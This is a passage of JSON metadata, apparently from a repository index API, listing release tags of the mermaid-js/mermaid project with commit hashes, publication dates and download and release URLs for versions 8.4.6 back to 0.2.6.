lished_at":"2020-01-22T18:53:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.6/manifests"},{"name":"untagged-f43366252632a1a42020","sha":"e0d16dcb22333f967e172e1f5b78af4baf6c0eff","kind":"commit","published_at":"2020-01-11T09:07:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/untagged-f43366252632a1a42020","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/untagged-f43366252632a1a42020","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@untagged-f43366252632a1a42020","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/untagged-f43366252632a1a42020/manifests"},{"name":"8.4.4","sha":"0544dbe89196f2709ad714432ed4f6c9883fa023","kind":"commit","published_at":"2019-12-14T08:27:38.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.4/manifests"},{"name":"8.4.3","sha":"cb07a729e5e11d58ee1bce43dc041b76a610bde2","kind":"commit","published_at":"2019-11-30T23:42:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.3/manifests"},{"name":"8.4.2","sha":"1ecf0f4c234a773c735dc56804233a66377db3b3","kind":"commit","published_at":"2019-11-07T20:16:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.2/manifests"},{"name":"8.4.1","sha":"a3017b8456cfafb446aedb9ad549328a69e24984","kind":"commit","published_at":"2019-11-06T18:52:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.1/manifests"},{"name":"8.4.0","sha":"0157f665a305b0616e7932360a2f9fb2fa154668","kind":"commit","published_at":"2019-10-19T14:59:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.4.0/manifests"},{"name":"8.3.0","sha":"0200fef389e3b0988557028d6edd03262ceeefba","kind":"commit","published_at":"2019-09-19T05:19:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.3.0/manifests"},{"name":"8.2.6","sha":"2cb54293f80af8c07bee8b91cfb04388e786fb83","kind":"commit","published_at":"2019-09-01T09:18:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.6/manifests"},{"name":"8.2.5","sha":"34d3b852271ea3b7ebf58553334ad3d5645c15f1","kind":"commit","published_at":"2019-08-26T18:23:54.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.5/manifests"},{"name":"8.2.4","sha":"a3142aad69167bc6b690e5a77550a869c86d79cd","kind":"commit","published_at":"2019-08-20T18:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.4/manifests"},{"name":"8.2.3","sha":"5b85fe9293493bc68d105cf78192ac475c9c6d0e","kind":"commit","published_at":"2019-07-25T19:00:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.3/manifests"},{"name":"8.2.2","sha":"cf686c445c069bd3137560f2ab3a30bfb7bc9dc5","kind":"commit","published_at":"2019-07-22T12:23:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.2/manifests"},{"name":"8.2.1","sha":"5dd392127f1121dea2a05fb0a535101c085496b2","kind":"commit","published_at":"2019-07-21T09:23:23.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.1/manifests"},{"name":"8.2.0","sha":"92ac7d7c2477071a7279927b023872d866571e28","kind":"commit","published_at":"2019-07-17T16:14:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.2.0/manifests"},{"name":"8.1.0","sha":"95967151ae61be7db104564dbf29db81a4415f11","kind":"commit","published_at":"2019-06-25T08:24:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/8.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/8.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@8.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/8.1.0/manifests"},{"name":"7.0.5","sha":"f6b5c704e8939db0047e7a70ab3b6109af261fb0","kind":"commit","published_at":"2017-09-01T10:34:10.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.5/manifests"},{"name":"7.0.3","sha":"1076d671374898a1e75b778911832da01f57b88f","kind":"commit","published_at":"2017-06-04T04:13:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.3/manifests"},{"name":"7.0.2","sha":"5f5c8a2df00d93d2a9ed48fa868d1a4ded761457","kind":"commit","published_at":"2017-06-01T05:38:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.2/manifests"},{"name":"7.0.0","sha":"fb70b9742a22f8673cdd3a8d74fcbbc6ea03b432","kind":"commit","published_at":"2017-01-29T11:14:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/7.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/7.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@7.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/7.0.0/manifests"},{"name":"6.0.0","sha":"b8d3b01f64f30fa1dd46f7de160e8f80147010f3","kind":"commit","published_at":"2016-05-29T17:25:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/6.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/6.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@6.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/6.0.0/manifests"},{"name":"0.5.8","sha":"6ee298dc7d5913ea065b92e736184edcc05b6c74","kind":"commit","published_at":"2016-01-27T14:02:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.8/manifests"},{"name":"0.5.7","sha":"f005c72669c0e41bac6f42f81a6805a923dacbf0","kind":"commit","published_at":"2016-01-25T17:59:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.7/manifests"},{"name":"0.5.6","sha":"425a83c0da996ba565c2b840993fbf61a725a84a","kind":"commit","published_at":"2015-11-22T17:55:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.6/manifests"},{"name":"0.5.5","sha":"c9d29c16e20783700701a340540959ed5680236c","kind":"commit","published_at":"2015-10-21T19:14:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.5/manifests"},{"name":"0.5.4","sha":"ecb12ae2a8bc7f8c7077737713cf94acffac5c41","kind":"commit","published_at":"2015-10-19T20:08:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.4/manifests"},{"name":"0.5.3","sha":"16906ee242fcaf51d77f082fc3e7167241432ab0","kind":"commit","published_at":"2015-10-04T21:28:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.3/manifests"},{"name":"0.5.2","sha":"a611ff3abd70103fc9ac44af63103e9f9d5991c9","kind":"commit","published_at":"2015-10-04T21:09:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.2/manifests"},{"name":"0.5.1","sha":"0dc983d04ab9400e604a460eea3a409570961ab2","kind":"commit","published_at":"2015-06-21T15:26:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.1/manifests"},{"name":"0.5.0","sha":"999430f9e0c18ca830f497817c8701cfbd2046f9","kind":"commit","published_at":"2015-06-07T15:05:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmerma